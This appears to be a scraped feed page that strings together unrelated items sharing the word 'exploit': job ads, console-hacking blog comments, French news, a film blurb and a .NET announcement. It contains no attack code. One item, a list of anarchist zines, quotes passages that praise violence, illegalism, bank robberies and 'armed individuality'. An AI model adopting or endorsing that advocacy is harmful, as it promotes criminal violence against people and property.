What is Ambush Marketing? Ambush marketing occurred when a non-sponsor of an event attempted to pass itself off as an official sponsor. Ambush marketing is defined as the practice whereby another company, often a competitor, intrudes upon public attention surrounding the event, thereby deflecting attention toward themselves and away from the sponsors. In simple words, non-sponsors to gain benefits available only to official sponsors exploit ambush marketing. When a sponsor purchases a sponsorship program, he aims towards orchestrating public attention onto its company or brand. In a typical sponsorship arrangement the sponsor purchases the sponsorship property rights and uses support promotion to further draw public attention to its involvement. The practice whereby another company, often...

This is a content summary only. Visit my website-www.mbaknol.com, for full links, other content, and more!

          Network Security Specialist - InfoTeK - Pensacola, FL      Cache   Translate Page      
Monitor and understand emerging threats on open source, defined as those technical vulnerabilities and exploits that could present a threat to government...
From InfoTeK - Wed, 05 Sep 2018 23:46:11 GMT - View all Pensacola, FL jobs
          Assistant(e) d'exploitation - Industrie du cinéma      Cache   Translate Page      
Assistant(e) d'exploitation - Industrie du cinéma in Brabant wallon
          Retrained staff 'key to exploiting big data'       Cache   Translate Page      
Skills shortages, particularly in the area of analytics, are hurting the ability of firms to exploit technological opportunities.
          Comment on Nintendo Switch Kernel exploit 34c3 presentation: “Nvidia Backdoored themselves” by Jailbroken Nintendo Switch devices now support customize firmware! – Jalvis Tech      Cache   Translate Page      
[…] in December of 2017, a group of hackers revealed at the Chaos Communication Congress in Germany that they successfully hacked the Switch’s version 3.0.0 firmware. The team also […]
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by Joo C      Cache   Translate Page      
Sounds promising! Thanks for the article Wololo!
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by Fallenleader      Cache   Translate Page      
Based on what I see and hear, it seems this is a software exploit that needs a hardmod to trigger it. Think of it like the PS3, where if you are hackable but on a higher firmware, a hardmod was needed to exploit it, or the DS flashards on the 3DS, as they could be patched to become useless in the firmware, but were necessary since DS games were physical cartridges.
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by Ghost mirror      Cache   Translate Page      
Probably HDMI hardware chip weld to PS4 motherboard
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by Sony Supreme Emperor      Cache   Translate Page      
I fart on Nintendo. Thanks for the article wololo!
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by PabloMontoya      Cache   Translate Page      
joemami, don't five them ideas!
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by joemami      Cache   Translate Page      
Sony will remove HDMI from next hardware ASAP lol
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by FArT mcfartstein      Cache   Translate Page      
FArT
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by Daniel Tome      Cache   Translate Page      
now would this kinda be like the switch hack where "every current console" would be exploitable regardless of firmware? can thus be fixed software side or does it gotta be a new hardware rev?
          Comment on PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4” by Fart'a'lot      Cache   Translate Page      
Well.. Fart
          Machiniste - Groupe G7 - Sept-Îles, QC      Cache   Translate Page      
Sous la direction du directeur d'usine, le ou la machiniste devra:. Mettre en place et exploiter des machines de coupe et de meulage de précision en métal...
From Indeed - Tue, 09 Oct 2018 18:20:11 GMT - View all Sept-Îles, QC jobs
          Comment on Invitation to Participate in the Consultation on the ‘Global Social Work Agenda: The Next Ten Years 2020-2030’ by Kathryn Campbell Kumka      Cache   Translate Page      
I'm a social work student in Canada. As social workers I think that we have to begin to explore how we can come together as a profession to challenge the marginalizing effects of globalization. As it currently stands globalization perpetuates a privileging of Western European ideals. The result is continuing oppression of global Indigenous populations, exploitation of our environment and resources, and the exploitation of already impoverished and oppressed nations. As it has become easier for corporations and politics to straddle global boundaries, I think the profession of social work should also strive to work in a cooperative manner to match and challenge this pattern.
          Raccourcis s’optimise pour les nouveaux iPad Pro      Cache   Translate Page      
Raccourcis [2.1.1 – Français – Gratuit – iPhone/iPad – iOS 12 – 141 Mo – Apple] reçoit une petite mise à jour ce soir, essentiellement pour adapter son interface aux nouveaux iPad Pro. Toutes les apps devront passer par cette étape pour offrir une expérience parfaite, avec une interface qui exploite tout l’écran. Raccourcis sur un iPad Pro 12,9 pouces de troisième génération. L’app corrige aussi plusieurs bugs, listés par Apple sur cette fiche technique. Certaines actions ne fonctionnaient pas quand un raccourci était lancé depuis Siri, d’autres pouvaient même terminer sur une erreur, etc. Raccourcis est une app gratuite, traduite en français et qui nécessite iOS 12. Elle permet d’automatiser certaines tâches sur les appareils iOS, comme nous l’expliquions dans notre prise en main.
          A List of New Anarchist Zines Published by Warzone Distro      Cache   Translate Page      

I'm not in the habit of posting a month to month update on newly added zines so here are some that have been published in the last couple months.

- Mapping the Fire: International Words of Solidarity with the Conspiracy of Cells of Fire

"“The following texts were translated and edited by the imprisoned members of the Conspiracy of Cells of Fire and by the comrades of Contra Info. We warmly thank them therefore, as well as the comrades A,M and E who contributed decisively in the handling of this attempt. Finally we greet the Chilean comrades from Entropia Ediciones for the version in Chile, and the comrades of Actforfreedomnow, boubour(A)s and 325 for the version in English.”

https://warzonedistro.noblogs.org/files/2017/09/mapping-the-fire_black-i...

- Beyond the “Movement” – Anarchy!

"“The collectivist message of The Coming Insurrection has little in common with insurrectional anarchy: the revolutionary theory flowing from the individual’s passionate uprising to appropriate the fullness of life for themselves, attacking all that controls and exploits, finding commonalities and affinities with others from which spring the real commune – the friends and accomplices of the guerrilla war against the totality of authoritarian society. Their insurrection may be coming, mine has come, it is an individual revolt. With no sovereign systems of morality, theory, principles or social abstractions standing above the singular individual, the nihilist­ anarchist attacks all systems, including identity and ideology systems, as obstacles to our self­ realisation. The struggle is against not only the domination of controlling social organisation and widespread tranquilisation, but also against inherited repressive programming and the force of daily life, and so our struggle is a constant tension where what we must destroy and transcend is much more obvious than where we might end up.”

https://warzonedistro.noblogs.org/files/2017/12/Beyond-The-Movement_Anar...

- Baedan: Queers Gone Wild (An excerpt from Baedan: A Journal of Queer Nihilism issue 1)

“If we can determine anything from our project of queer negativity, it is that capitalism has an unlimited capacity to tolerate and recuperate any alternative politics or artistic expression we could imagine. It is not a political negativity that we must locate in our queerness, but rather a vicious anti-politics which opposes any utopian dreams of a better future residing on the far side of a lifetime of sacrifice. Our queer negativity has nothing to do with art, but it has a great deal to do with urban insurrection, piracy, slave revolt: all those bodily struggles that refuse the future and pursue the irrationality of jouissance, enjoyment, rage, chaos. Ours is not the struggle for an alternative, because there is no alternative which can escape the ever-expanding horizons of capital. Instead we fight, hopeless, to tear our lives away from that expanding horizon and to erupt with wild enjoyment now. Anything less is our continued domestication to the rule of civilization.”

https://warzonedistro.noblogs.org/files/2017/12/Baedan_Queers-Gone-Wild.pdf

- War Against the Information Age: A Future of Mass Social Control

"The future of civilisation is an increasing merger of state and corporate power, with the new sciences as an essential ally. With war and crisis always as a pretext, the elite have declared dominion over every free individual, animal, plant and wilderness. Emerging as the omnipresent machine intelligence that forms human beings to its whims, it damages and manipulates entire continents of beings. Reflecting our emptiness and our loss, the prison-society must be fought, because the logic which it operates on is a system of closure of parameters that work by exclusion of vast amounts of alternative possibilities andpotentials. It is self-referential and non-creative; it pursues a model of progress that is the abolition of personal individuality and freedom."

https://warzonedistro.noblogs.org/files/2018/07/war-against-the-informat...

- Smashing the Petri Dish: Abbreviated Inquiry Into Abandoning the Concept of Culture

“For many, to abandon culture seems a project too daunting, shocking, and counter to what we may have always believed. But when we talk of undoing the entirety of civilization, are there questions too colossal to ask and material too compact to cut through? To dispute culture itself, and the physicality of its politicized manifestation, society, is to question civilization’s very premise, that we are controlled and manipulated by external forces that have an agenda ultimately incompatible with that of the individual, regardless of their desires (although there may be illusory moments of adaptability). Whether there are direct lines drawn to individuals or groups in power, or the rigid formation of patterns and textures over time, culture controls. It must, or it ceases to exist. Culture can be viewed as the summation of who we are as social beings, or the parameters we live within. Both are unsatisfactory for one attempting an uncivilized and unrestrained existence. If we are to live entirely different, than what seems foundational and what binds all of this (civilization) must be unglued. The imprint must be erased. The structures must be shattered, so as to open up the space for our unimpeded wild selves to roam.”

https://warzonedistro.noblogs.org/files/2018/10/Smashing-The-Petri-Dish.pdf

- Scandalous Thoughts: A Few Notes On Civil Anarchism

“To negate the role of individual action in favour of a vague conception of the “class struggle” of yesteryear is a dangerous fiction. Certainly, since it is also the project of the State to destroy the volition and value of the individual; it cannot be called revolutionary, except in the autocratic uber­-political sense of being ruled by statist apparatus – none of which desire empowered individuals or like­minded groups of individuals who want freedom.”

https://warzonedistro.noblogs.org/files/2018/10/Scandalous-Thoughts_A-Fe...

- Questioning (the authority of) Psychiatry

“Why is self-control, autonomy, such a threat to authority? Because the person who controls himself, who is his own master, has no need for an authority to be his master. This, then, renders authority unemployed. What is he to do if he cannot control others? To be sure, he could mind his own business. But this is a fatuous answer, for those who are satisfied to mind their own business do not aspire to become authorities.” -Thomas S. Szasz

https://warzonedistro.noblogs.org/files/2018/09/Questioning-Psychiatry.pdf

- In Praise of Chaos

"Anarchists are opposed to authority both from below and from above. They do not demand power for the masses, but seek to destroy all power and to decompose these masses into individuals who are masters of their own lives. Therefore anarchists are the most decisive enemies of all types of communism and those who profess to be communists or socialist cannot possibly be anarchists."

https://warzonedistro.noblogs.org/files/2018/07/In-Praise-of-Chaos.pdf

- I Am Also A Nihilist

"And if I call myself an individualist anarchist, an iconoclast and a nihilist, it is precisely because I believe that in these adjectives there is the highest and most complete expression of my willful and reckless individuality that, like an overflowing river, wants to expand, impetuously sweeping away dikes and hedges, until it crashes into a granite boulder, shattering and breaking up in its turn. I do not renounce life. I exalt and sing it.”

https://warzonedistro.noblogs.org/files/2017/09/I-Am-Also-A-Nihilist.pdf

- Fragment: Violence

“Outside of the UK many of the comrades have a much closer relationship to “violence” and “criminality” through bank robberies, organising attacks, fierce demos, stealing, fraud, counterfeiting etc. and added to that possibility the experience of clandestinity or living underground. Illegalism is the bread of the insurrection. Many have gone to prison already and we can learn about their cases in many places. In the UK there is a widespread lack of experience concerning the organisation of the attack, the recognition of the ideas and relationships of the affinity groups to the “criminal acts”. Going beyond the law is part of developing the anarchist-insurrectional project and this is part of the reason why the civil anarchists despise and neglect the cases of the imprisoned and fugitive comrades- because they reject their actions, the tendencies of attack and the global discourse of anarchists of praxis. Individual acts of violence/negation which are not approved by their group-think are regarded as part of the “criminal” or “terrorist” sphere and smeared as provocations. In this way, the civil anarchists become part of the discourse of power and compose themselves as a sector of repression.”

https://warzonedistro.noblogs.org/files/2018/10/Fragment_Violence.pdf

- Drawing First Blood

“Every attempt to free humanity en masse is bound to fail because collective self-determination is a contradiction in terms. There is no such thing as the common good, for there is no good that is common to all. Society, collective, and public are only convenient terms to designate individuals in the aggregate; they are not entities — they have no bodies, minds, interests, or real existence: A collective has no self, and is but a collection of selves who have waived their individual powers and will to self-determination, for what is claimed to be the interests of the majority. The price paid for collective unity is always the subordination of the member units, which is the antithesis of anarchy…”

https://warzonedistro.noblogs.org/files/2018/10/Drawing-First-Blood.pdf

- Decomposing the Masses: Towards Armed Individuality

“I want to weaponize chaos as an individualized attack on all governance and social order. I envision anarchy as a wildfire that blackens the civilized, domesticated kingdom of institutional and social domination. Getting free is more than just attacking capital and the state. At least for me, it also means creating your self every single day beyond society’s attempts to define you as a static being.”

https://warzonedistro.noblogs.org/files/2018/10/Decomposing-the-Masses_T...

- Vegan Means Attack: Fomenting A Wildfire Against Speciesism and Moral Anthropocentrism

“There is a war to be waged against society, alongside the non-human animals who refuse domesticated subservience, and who are evicted from their homes due to mass deforestation, human development and technology. Veganism burdened by the millstone of liberalism, fails to critically acknowledge capitalist, industrial civilization itself as the massified, embodiment of anthropocentric domination. Anarchism that fails to challenge speciesism on an individual level reproduces the internalized authoritarian values of human domination. Since speciesism is pervasive in society, it is insulated and well preserved by a comforting normalization – a normalization that aids cultural indoctrination and apathy. Confrontation is necessary in unsettling the socially established comforts and moral order of non-human animal domination.”

https://warzonedistro.noblogs.org/files/2018/10/Vegan-Means-Attack.pdf

- Veganism From A Nihilist and Anti-Civilization Perspective

“This text is aiming for the destabilization of the term veganism through moral and social, even political chains and illustrates that if it doesn’t align with a totally hostile consciousness towards the existent, then it doesn’t cease to be another hoax or delusion. That is to say if the persons using this tool have made that another morality or don’t take some risks with acts of attack (this can take many forms not only physical) or chaotic disruption then it remains mud inside the swamp where it came from.” -Archegonos

https://warzonedistro.noblogs.org/files/2018/08/Veganism-From-A-Nihilist...

- Weaponizing Sobriety: Feral Anarchy Against Intoxication Culture

“As an anarchist, I refuse to tranquilize the chaos of my jouissance with inebriation. I exalt life vehemently against the pacifying qualities of marijuana, the cancerous addiction of tobacco, and the “correctional” anesthesia of psychiatric medications. The intoxication-based realities of poverty, addiction, and death motivate my personal desire to remain sober and supportive of those struggling. As long as I exist, my sobriety remains a weapon against capitalism, a weapon which can not be confiscated by the social conformity essential to intoxication culture. Towards individualist revolt and a straight edge anarchist praxis, straight edge means attack.”

https://warzonedistro.noblogs.org/files/2018/10/Weaponizing-Sobriety_Fer...

****New zines that are still in the works and will be available for download by early next month:

- To The Customers: Insurrection and Doublespeak (A critique of The Coming Insurrection & Invisible Committee)
- Against The Gendered Nightmare (Baedan) (Anti-civ and nihilist critique of gender)
- INSURGENCY: An Anarchist Journal of Total Destruction (a collection of fresh written post-left, nihilist, anti-civ insurrectionary anarchist essays and actions)

www.warzonedistro.noblogs.org

category: 

          Nouvelle édition des Micros d'Or      Cache   Translate Page      
L’Union des Journalistes de Sport en France (UJSF) organise annuellement les Micros d’Or qui désignent les meilleurs reportages de sport de la presse audiovisuelle. Les Micros d’Or sont parrainés par le Comité National Olympique et Sportif Français (CNOSF). Les reportages doivent obligatoirement concerner le sport, l’exploit ou l’aventure sportive.
Nouvelle édition des Micros d'Or

Ce prix, intitulé "Micros d’Or ", parrainé par le CNOSF, destiné à privilégier l’image, le son, le journaliste (rédacteur, reporter, JRI) et son équipe, comprend un sujet radio, un sujet TV Journal, un sujet TV Handisport et sports adaptés et un sujet TV magazine Les reportages devront avoir été diffusés pour la première fois au cours de la période des douze mois précédant la date présélection de la dernière édition, soit dans le cadre des journaux radiophoniques ou télévisés, régionaux ou nationaux, soit dans des émissions magazines d’information nationale ou régionale. En raison des Jeux Olympiques de ce début d’année, le palmarès se dotera d’une catégorie supplémentaire, la catégorie "Micro d’Or Olympique". Concernant les reportages Paralympiques, ils seront reclassés dans la catégorie
Handisports et sports adaptés.

Pour être acceptés, les sujets soumis à la compétition doivent avoir été diffusés sur les antennes des télévisions, de radios ou sur les chaînes internet des médias français. Les reportages doivent obligatoirement présenter une oeuvre de création réalisée soit par une équipe réduite ou complète en ce qui concerne la télévision, soit par une équipe réduite au seul journaliste pour le concours radio. Les reportages présentés doivent être l’oeuvre de professionnels titulaires de la carte nationale d’identité de journaliste validée pour l’année en cours. Ils peuvent être membres ou non de l’UJSF. Date limite d’envoi des sujets : le 10 novembre 2018. Proclamation du Palmarès : le19 décembre 2018  à 21h00.


          Conférence Influence Day 2018 : Comprendre, détecter, évaluer 👉 Comment exploiter le potentiel des micro-influenceurs ?      Cache   Translate Page      

J’aurai le plaisir de vous retrouver à l’occasion de cette nouvelle édition de Influence Day, l’événement dédié à la stratégie d’influence, gestion de crise, media intelligence et réputation digitale, le mercredi 14 novembre. A 12h30, je vous accueille pour une conférence dédiée aux micro-influenceurs : COMPRENDRE, DÉTECTER, ÉVALUER Comment exploiter le potentiel des micro-influenceurs ?    […]

The post Conférence Influence Day 2018 : Comprendre, détecter, évaluer 👉 Comment exploiter le potentiel des micro-influenceurs ? appeared first on Digimind Blog.


          Ruthless Portable Vaporizer Strategies Exploited      Cache   Translate Page      

Ruthless Portable Vaporizer Strategies Exploited It is going to be unpleasant and a bit hot. The trees aren’t too numerous on the islands nowadays and hence they maintained. Just about every vaporizer differs though so just bear in your mind they are not completely sterile! How to Choose Portable Vaporizer You can also decide on […]

The post Ruthless Portable Vaporizer Strategies Exploited appeared first on Adotas.


          Non, la puce T2 n’empêche pas d’installer Linux      Cache   Translate Page      
La polémique est apparue hier, quand le site Phoronix a publié un article indiquant que la puce T2 des Mac récents bloquerait toute installation de Linux. Depuis, l’information a fait le tour de quelques sites, alors même qu’elle n’est pas nouvelle et qu’elle est en grande partie fausse. Non, la puce T2 n’empêche pas d’installer une distribution GNU/Linux, même si l’utilisateur doit désactiver une partie de ses fonctions de sécurité pour y parvenir. La puce T2 sur la carte-mère d’un MacBook Pro de 2018 (image iFixit) L’iMac Pro, les MacBook Pro 13 et 15 pouces de 2018, le nouveau MacBook Air et le nouveau Mac mini sont tous équipés d’une puce ARM, nommée Apple T2. Celle-ci se charge globalement de la sécurité du système, à la fois en gérant le SSD chiffré à la volée, en contrôlant plusieurs aspects du matériel et en particulier la webcam ou le microphone, et aussi en vérifiant au démarrage que le système d’exploitation n’est pas corrompu. C’est cette dernière fonction, nommée... Lire la suite sur MacGeneration
          Angola: Mozambique and Angola Call for Increased Trade      Cache   Translate Page      
[AIM] Maputo -The Mozambican and Angolan governments on Friday declared their interest in increasing trade between the two countries, and stepping up the exchange of experiences in the exploitation of hydrocarbons.
          débroussailleur saisonnier/débroussailleuse saisonnière - exploitation forestière et foresterie - NIKONAL INC. - Trois-Rives, QC      Cache   Translate Page      
Salaire min. 1 500,00 $ max. 2 500,00 $ par semaine pour 60 heures par semaine. Renseignements sur l’emploi. Date prévue de début Dès que possible.... $2,500 a week
From Guichet emplois - Fri, 26 Oct 2018 09:38:16 GMT - View all Trois-Rives, QC jobs
          Heureux comme Lazzaro      Cache   Translate Page      

Drame (02h07min) - Lazzaro, un jeune paysan d’une bonté exceptionnelle vit à l’Inviolata, un hameau resté à l’écart du monde sur lequel règne la marquise Alfonsina de Luna. La vie des paysans est inchangée depuis toujours, ils sont exploités, et à leur tour, ils abusent de la bonté de Lazzaro.

Un film de Alice Rohrwacher
Avec Adriano Tardiolo, Alba Rohrwacher, Agnese Graziani, Tommaso Ragno, Luca Chikovani

Presse : 4 - Spectateurs : 3.5

>> Fiche complète du film | Séances des 157 cinémas | Bandes-annonces | Photos | sur AlloCiné


          Anti-BP Protesters Sip Oily Champagne in Satirical Performance at the British Museum      Cache   Translate Page      

Performers dressed as BP employees sipped oil-contaminated champagne, and protesters displayed facts about BP's exploitation of Iraqi resources.

The post Anti-BP Protesters Sip Oily Champagne in Satirical Performance at the British Museum appeared first on Hyperallergic.


          Comment on PS Vita 3.69 confirmed to patch h-encore, TheFlow to open source the exploit by ashim      Cache   Translate Page      
my vita is of 3.69 i upgarded beacuse i did not kenw about it now can i do aif you have any ideanything any ides pls say to me
          Migrants : violation de droits de l’homme en Libye et cynisme européen      Cache   Translate Page      

Une situation intenable

En Libye, les migrants sont torturés ou exploités. L'Europe regarde ailleurs quand elle ne met pas des bâtons dans les hélices des bateaux des ONG qui tentent de sauver les migrants en Méditerranée...

Tripoli, le 4 Juillet 2015. Centre de détention pour migrants illégaux à Garabouli, dans la région de Tripoli. - Cyril Marcilhacy - © Cyril Marcilhacy

Fin 2015, nous nous étions rendus à Tripoli en Libye. Profitant de la visite d’un député français, nous avions pu accéder à deux centres de rétention. Dans ces centres répartis dans tout le pays, certains officiels contrôlés par la polices, d’autres aux mains de milices, des milliers d’Érythréens, de Soudanais, de Maliens et de Nigériens sont détenus dans des conditions inhumaines. Les centres que nous avions pu visiter étaient évidemment les plus « présentables ». Mais les photos et les témoignages que nous avions pu en rapporter montraient la dureté des conditions de détention.

Dans l’un de ces centres officiels, adossé à un poste de police de Tripoli, Misron, un Erythréen de 13 ans, raconte son histoire. « Je suis parti il y a deux mois. Sans le dire à mes parents… J’en avais assez de la pauvreté et de la dictature. J’ai mis un mois pour me rendre à Karthoum au Soudan. Là, j’ai rencontré quatre autres jeunes Erythréens et nous avons décidé de poursuivre ensemble le voyage jusqu’en Europe. Nous avons mis un mois pour arriver jusqu’à la côte libyenne. Nous avons été arrêtés il y a dix jours. » Pour payer leur voyage, ils ont fait des petits boulots au gré de leur périple. Un policier tient à nous montrer que le migrants sont bien traités. « Nous avons même une infirmerie ici. » Il nous entraîne vers une porte métallique donnant dans la cour. Il cherche désespérément la clef, la demande a un collègue. En vain. Il a un petit rire un peu gêné. Visiblement, il ne vaut mieux...


          Win Toei’s ORGIES OF EDO Blu-ray from Arrow Video US!      Cache   Translate Page      
Source: Arrow Video US, MVD Entertainment Group Special Thanks to Clint Weiler Arrow Video US is offering SciFi Japan readers a chance to win their new Blu-ray of Teruo Ishii's ORGIES OF EDO (残酷異常虐待物語 元禄女系図, Zankoku Ijo Gyakutai Monogatari: Genroku Onna Keizu, 1969), a bloody follow-up to his SHOGUN'S JOY OF TORTURE (徳川女刑罰史, Tokugawa Onna Keibatsu-shi, 1968), and the fourth entry in Toei's 'abnormal love' film series. Arrow Video US' release features a HD (1080p) digital transfer, the original uncompressed mono PCM audio, optional English subtitles, newly filmed interview with author Patrick Maccias, and a reversible sleeve featuring original and newly commissioned artwork by Matt Griffin, with the first pressing including an illustrated collector’s booklet featuring new writing on the film by author Tom Mes. The suggested retail price is $39.95. Continued...

          An Update on the Edge XSS Filter      Cache   Translate Page      
In Windows 10 RS5 (aka the “October 2018 Update”), the venerable XSS Filter first introduced in 2008 with IE8 was removed from Microsoft Edge. The XSS Filter debuted in a time before Content Security Policy as a part of a basket of new mitigations designed to mitigate the growing exploitation of cross-site scripting attacks, joining older features like HTTPOnly […]
          Faissal Ben Kiran expone en Medina Art Gallery de Tánger      Cache   Translate Page      

Prologo en francés del profesor y pintor marroquí Saad Ben Cheffaj. Este texto aparece en el catalogo de la exposición del pintor Faissal Ben Kiran que se estrenara en la Medina Art Gallery de Tánger el 9 de noviembre de 2018 y se clausurara el 30 del mismo mes. 

Faissal Ben Kiran (1975) es natural de Tetuán (Marruecos) y actualmente ejerce de profesor de Artes Plásticas en la misma ciudad.

Óleo sobre tela 93x70 cm20

Prologo de Saad Ben Cheffaj: 

"Depuis que Faissal Ben Kiran était mon élève à l`École de Beaux-Arts de Tétouan, j`étais toujours convaincu qu`un artiste d`une immense valeur émergerait de cet apprentissage. Cela a été parfaitement démontré par ses expositions au Maroc et ailleurs. Ses thèmes sont variés, des natures mortes et des portraits, qu›il peint avec une technique admirable et des proportions harmonieuses.

Les œuvres de Faissal exaltent à la fois la beauté comme les œuvres de la Renaissance, qui se manifestent parfois au style de Raphaël. Faissal a les qualités d›un grand artiste comme Albrecht Durer, ses natures mortes ne sont pas seulement des images, mais on les ressent vivantes, avec une âme comme dans celles de Velázquez. Et comme je l›ai toujours dit, l›artiste peint non seulement avec des couleurs, mais aussi avec des connaissances culturelles, des connaissances que nous voyons clairement exploitées dans les œuvres de Ben Kiran. Quand nous les contemplons, nous ne nous trouvons pas seulement devant une simple exposition, mais nous sentons aussi une touche qui s›étend à l›âme, un effet éternel qui l›accompagne toute la vie.

Un grand merci à Faissal Ben Kiran pour nous avoir éblouis par ses belles créations."

"Desde que Faissal Ben Kiran fue mi alumno en la escuela de Bellas Artes de Tetuán, siempre estaba convencido de que surgiría, de aquel aprendizaje, un artista de gran valor. Esto se ha demostrado perfectamente por sus exposiciones en Marruecos y otros lugares. Sus temas son muy variados, naturalezas muertas y retratos, que el pinta con técnicas admirables y proporciones armoniosas.

Las obras de Faissal exaltan tanto por su belleza como las del Renacimiento, a veces se manifiestan con el estilo de Rafael. Faissal tiene cualidades como el gran artista Albrecht Dürer, sus bodegones, naturaleza muerta, parecen como instantáneas, pero las sentimos como vivas y con alma como las obras de Velázquez. Y como siempre he comentado, el artista no solo pinta con colores, pero también con conocimientos culturales, que vemos claramente reflejados en las obras de Ben Kiran. Cuando las contemplamos, no sólo estamos delante de una simple exposición, pero también sentimos un caricia que se tiende sobre nuestras almas como un eterno efecto que nos acompañara toda la vida.

Muchas gracias a Faissal Ben Kiran por hacernos deslumbrar con sus hermosas creaciones."

El Pintor Faissal Ben Kiran y Omar Salhi
propietario de Medina Art Gallery.


          Titre Associé aux Ventes Sans-Fil - Val d'Or - OSL Retail Services Inc - Val-d'Or, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Wed, 31 Oct 2018 01:20:15 GMT - View all Val-d'Or, QC jobs
          Titre Gérant de Magasin Sans-Fil - OSL Retail Services Inc - Québec City, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Chez OSL, nous savons comment récompenser nos employés. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans...
From OSL Retail Services Inc - Mon, 17 Sep 2018 19:20:40 GMT - View all Québec City, QC jobs
          Titre Associé aux Ventes Sans-Fil - Ste Foy - OSL Retail Services Inc - Sainte-Foy, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Fri, 26 Oct 2018 19:19:09 GMT - View all Sainte-Foy, QC jobs
          Titre Associé aux Ventes Sans-Fil - Joliette - OSL Retail Services Inc - Joliette, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Mon, 29 Oct 2018 19:19:28 GMT - View all Joliette, QC jobs
          Titre Associé aux Ventes Sans-Fil - Lachenaie Terrebonne - OSL Retail Services Inc - Lachenaie, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Fri, 02 Nov 2018 19:18:29 GMT - View all Lachenaie, QC jobs
          Titre Associé aux Ventes Sans-Fil - Blainville - OSL Retail Services Inc - Blainville, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Wed, 31 Oct 2018 01:20:24 GMT - View all Blainville, QC jobs
          Titre Associé aux Ventes Sans-Fil - Rosemère - OSL Retail Services Inc - Rosemère, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Tue, 30 Oct 2018 19:18:57 GMT - View all Rosemère, QC jobs
          Titre Associé aux Ventes Sans-Fil - St Hyacinthe - OSL Retail Services Inc - Saint-Hyacinthe, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Fri, 19 Oct 2018 19:22:18 GMT - View all Saint-Hyacinthe, QC jobs
          Titre Associé aux Ventes Sans-Fil - St Eustache - OSL Retail Services Inc - Saint-Eustache, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Wed, 31 Oct 2018 01:20:20 GMT - View all Saint-Eustache, QC jobs
          Titre Associé aux Ventes Sans-Fil - Longueuil E - OSL Retail Services Inc - Longueuil, QC      Cache   Translate Page      
Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
From OSL Retail Services Inc - Mon, 29 Oct 2018 19:19:37 GMT - View all Longueuil, QC jobs
          Gold Diggers      Cache   Translate Page      

https://img-hws.y8.com/cloud/y8-thumbs/4323/thumbnail464x348.gif Gold Diggers is an Gold Mining Game. Use your snake like suction machine to exploit all the gold in the mines before the time runs out. The mines are infested by deadly monsters, so dont let them bite your pipes otherwise you will lose the game. On the other hand you can suck them up to clear your way. Also avoid the bombs or they will blow up your pipes.


          Announcing .NET Standard 2.1      Cache   Translate Page      

Since we shipped .NET Standard 2.0 about a year ago, we’ve shipped two updates to .NET Core 2.1 and are about to release .NET Core 2.2. It’s time to update the standard to include some of the new concepts as well as a number of small improvements that make your life easier across the various implementations of .NET.

Keep reading to learn more about what’s new in this latest release, what you need to know about platform support, governance and coding.

What’s new in .NET Standard 2.1?

In total, about 3k APIs are planned to be added in .NET Standard 2.1. A good chunk of them are brand-new APIs while others are existing APIs that we added to the standard in order to converge the .NET implementations even further.

Here are the highlights:

  • Span<T>. In .NET Core 2.1 we’ve added Span<T> which is an array-like type that allows representing managed and unmanaged memory in a uniform way and supports slicing without copying. It’s at the heart of most performance-related improvements in .NET Core 2.1. Since it allows managing buffers in a more efficient way, it can help in reducing allocations and copying. We consider Span<T> to be a very fundamental type as it requires runtime and compiler support in order to be fully leveraged. If you want to learn more about this type, make sure to read Stephen Toub’s excellent article on Span<T>.
  • Foundational-APIs working with spans. While Span<T> is available as a .NET Standard compatible NuGet package (System.Memory) already, adding this package cannot extend the members of .NET Standard types that deal with spans. For example, .NET Core 2.1 added many APIs that allow working with spans, such as Stream.Read(Span<Byte>). Part of the value proposition to add span to .NET Standard is to add theses companion APIs as well.
